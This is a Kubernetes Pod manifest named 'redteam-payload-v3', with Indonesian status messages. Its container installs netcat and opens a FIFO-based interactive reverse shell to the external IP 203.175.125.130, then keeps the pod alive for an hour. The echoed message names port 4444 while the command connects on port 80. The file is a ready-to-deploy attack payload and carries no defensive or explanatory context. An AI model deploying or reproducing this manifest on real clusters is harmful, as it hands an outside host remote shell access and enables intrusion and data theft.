apiVersion: v1
kind: Pod
metadata:
  name: redteam-payload-v3
  namespace: backbase
spec:
  containers:
  - name: alpine
    image: alpine:latest
    command: ["/bin/sh"]
    args:
      - -c
      - |
        echo "=== Mencoba reverse shell (FIFO method) ==="
        echo "Menginstall netcat (kalo belum ada)..."
        apk add --update netcat-openbsd
        echo "Menjalankan reverse shell ke 203.175.125.130:4444..."
        rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 203.175.125.130 80 > /tmp/f
        echo "Reverse shell selesai atau gagal. Pod tetap jalan 1 jam."
        sleep 3600
  restartPolicy: Never
